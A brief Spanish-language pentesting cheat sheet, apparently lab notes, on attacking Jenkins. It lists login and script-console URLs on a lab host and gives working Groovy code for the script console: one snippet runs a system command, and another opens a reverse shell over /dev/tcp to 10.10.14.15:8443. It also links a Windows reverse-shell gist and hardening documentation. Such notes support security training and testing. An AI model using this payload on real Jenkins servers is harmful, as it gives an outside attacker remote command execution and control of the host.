Jenkins

Documentación

https://www.jenkins.io/arrow-up-right


Discovery/Footprinting

http://jenkins.inlanefreight.local:8000/loginarrow-up-right

Ataques

http://jenkins.inlanefreight.local:8000/scriptarrow-up-right

Linux

def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76#file-revsh-groovyarrow-up-right

Hardening

https://www.jenkins.io/doc/book/security/securing-jenkins/arrow-up-right

https://plugins.jenkins.io/matrix-autharrow-up-right

Last updated